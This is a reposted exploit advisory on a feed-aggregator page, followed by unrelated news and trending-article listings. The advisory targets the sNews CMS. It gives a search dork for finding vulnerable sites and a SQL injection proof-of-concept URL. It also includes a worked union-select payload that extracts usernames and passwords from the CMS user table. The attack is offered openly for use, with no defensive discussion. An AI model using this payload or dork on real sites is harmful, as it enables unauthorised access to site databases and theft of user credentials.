Channel: MondoUnix » SERVICE

Snews CMS SQL Injection

January 16, 2013, 5:35 am

≪ Previous: phpLiteAdmin 1.8.x / 1.9.x SQL Injection

# Exploit Title : CMS snews SQL Injection Vulnerability
# Author        : By onestree
# Software Link : http://snewscms.com/
# tested        : ubuntu 12.10 / win 7
# Dork          : inurl:"tanyakan pada rumput yang bergoyang"
 
 
*************************************************************
 
SQL poc:
 
http://localhost/snews/snews.php?act=shownews&id=[SQL]
 
Example:
 
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
 
 
Thanks : 
 
  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
 
          indonesiancoder - moeslimh4x0r - go-coder
 
spesial my hunny :*

↧

↧

Latest Images

‘Pay day every day’ may become Shangri-La Group, BPOs’ secret to happy employees

April 25, 2024, 5:51 am

Nonprofit donates custom home in this East Bay city for Marine injured in...

Nonprofit donates custom home in this East Bay city for Marine injured in...

April 23, 2024, 7:00 am

New private rooms on Tokaido Shinkansen change the way we travel from Tokyo...

New private rooms on Tokaido Shinkansen change the way we travel from Tokyo...

April 22, 2024, 6:00 am

Ukraine bans military from online gambling amid addiction concerns

Ukraine bans military from online gambling amid addiction concerns

April 22, 2024, 5:17 am

ಮಂಡ್ಯದಿಂದ ಸುಮಲತಾ ದೂರ; ಹೆಚ್‌ಡಿಕೆ ಪರ ಪ್ರಚಾರಕ್ಕಿಳಿಯದ ಸಂಸದೆ –ಬರ್ತಾರೆ ನೋಡೋಣ ಎಂದ...

ಮಂಡ್ಯದಿಂದ ಸುಮಲತಾ ದೂರ; ಹೆಚ್‌ಡಿಕೆ ಪರ ಪ್ರಚಾರಕ್ಕಿಳಿಯದ ಸಂಸದೆ –ಬರ್ತಾರೆ ನೋಡೋಣ ಎಂದ...

April 20, 2024, 8:08 pm

OCBC Bank Singapore Offers Up to 2.8% p.a. Fixed Deposit Promotion from 21...

April 20, 2024, 12:38 pm

National Poetry Month 2024: Maxine Starr

National Poetry Month 2024: Maxine Starr

April 19, 2024, 9:56 am

Vegan Chicken Pot Pie

Vegan Chicken Pot Pie

April 19, 2024, 9:18 am

Firefox UX: On Purpose: Collectively Defining Our Team’s Mission Statement

Firefox UX: On Purpose: Collectively Defining Our Team’s Mission Statement

April 19, 2024, 7:03 am

New $4.5 million East Bay trail path will connect bicyclists, pedestrians to...

New $4.5 million East Bay trail path will connect bicyclists, pedestrians to...

April 18, 2024, 11:05 am

Trending Articles

Practice Sheet of Right form of verbs for HSC Students

September 22, 2019, 11:40 pm

Ready Made Periodical Test Questions for all Grades with TOS (1st - 4th Quarter)

October 28, 2018, 2:19 am

At the end of an episode of television show parking wars it says in memory of...

July 25, 2011, 7:33 pm

Girls WhatsApp Numbers Collection For Friendship

January 20, 2021, 5:55 pm

Online Grading System with Grade Viewing Capstone Project

February 27, 2019, 2:08 am

FLASH BACK LIVE IN KAHATHUDUWA 2012

January 13, 2017, 12:14 am

Happy Birthday Wishes for Bhabhi in Hindi & English |हैप्पी बर्थडे भाभी

March 13, 2020, 3:01 am

Isilon CLI Command Reference

May 9, 2017, 9:25 am

SSF_ALERT_CERTEXPIRE: invalid message received in email

October 24, 2015, 11:48 am

Money launderer told to pay up or be locked up

April 30, 2013, 4:08 am

A Superb Baroque: Art in Genoa, 1600–1750

March 10, 2020, 2:06 pm

Jamel Debbouze : 100% Debbouze [FRENCH AC3] [DVDRiP] [MULTI]

April 1, 2013, 11:10 pm

Top 10 Hot and Sexy Photos of Beautiful Woranut Bhirombhakdi

March 18, 2014, 12:24 pm

Top 500 Stylish Work Symbols for Facebook VIP Copy & Paste

February 24, 2024, 1:50 pm

Who Is Jennifer Hines? Bryan Olesen Wife Is Mother Of 3 Kids

March 5, 2024, 2:19 am

Natsamrat(2016) Full Marathi Movie HDRip Print Download

July 19, 2016, 7:53 pm

Impotent Little Sissy featuring Mistress Clarissa

July 26, 2017, 7:31 am

Review of Related Literature and Studies of Hotel Reservation System

November 22, 2018, 6:00 pm

Gamot sa balisawsaw: 6 na mga quick home remedy sa sintomas ng balisawsaw

August 25, 2022, 8:00 pm

Download EFF Album: 12 –“ASINAMALI”

February 18, 2019, 6:51 am

More Pages to Explore .....

Latest Images

‘Pay day every day’ may become Shangri-La Group, BPOs’ secret to happy employees

April 25, 2024, 5:51 am

Nonprofit donates custom home in this East Bay city for Marine injured in...

Nonprofit donates custom home in this East Bay city for Marine injured in...

April 23, 2024, 7:00 am

New private rooms on Tokaido Shinkansen change the way we travel from Tokyo...

New private rooms on Tokaido Shinkansen change the way we travel from Tokyo...

April 22, 2024, 6:00 am

Ukraine bans military from online gambling amid addiction concerns

Ukraine bans military from online gambling amid addiction concerns

April 22, 2024, 5:17 am

ಮಂಡ್ಯದಿಂದ ಸುಮಲತಾ ದೂರ; ಹೆಚ್‌ಡಿಕೆ ಪರ ಪ್ರಚಾರಕ್ಕಿಳಿಯದ ಸಂಸದೆ –ಬರ್ತಾರೆ ನೋಡೋಣ ಎಂದ...

ಮಂಡ್ಯದಿಂದ ಸುಮಲತಾ ದೂರ; ಹೆಚ್‌ಡಿಕೆ ಪರ ಪ್ರಚಾರಕ್ಕಿಳಿಯದ ಸಂಸದೆ –ಬರ್ತಾರೆ ನೋಡೋಣ ಎಂದ...

April 20, 2024, 8:08 pm

OCBC Bank Singapore Offers Up to 2.8% p.a. Fixed Deposit Promotion from 21...

April 20, 2024, 12:38 pm

National Poetry Month 2024: Maxine Starr

National Poetry Month 2024: Maxine Starr

April 19, 2024, 9:56 am

Vegan Chicken Pot Pie

Vegan Chicken Pot Pie

April 19, 2024, 9:18 am

Firefox UX: On Purpose: Collectively Defining Our Team’s Mission Statement

Firefox UX: On Purpose: Collectively Defining Our Team’s Mission Statement

April 19, 2024, 7:03 am

New $4.5 million East Bay trail path will connect bicyclists, pedestrians to...

New $4.5 million East Bay trail path will connect bicyclists, pedestrians to...

April 18, 2024, 11:05 am

© 2024 //www.rssing.com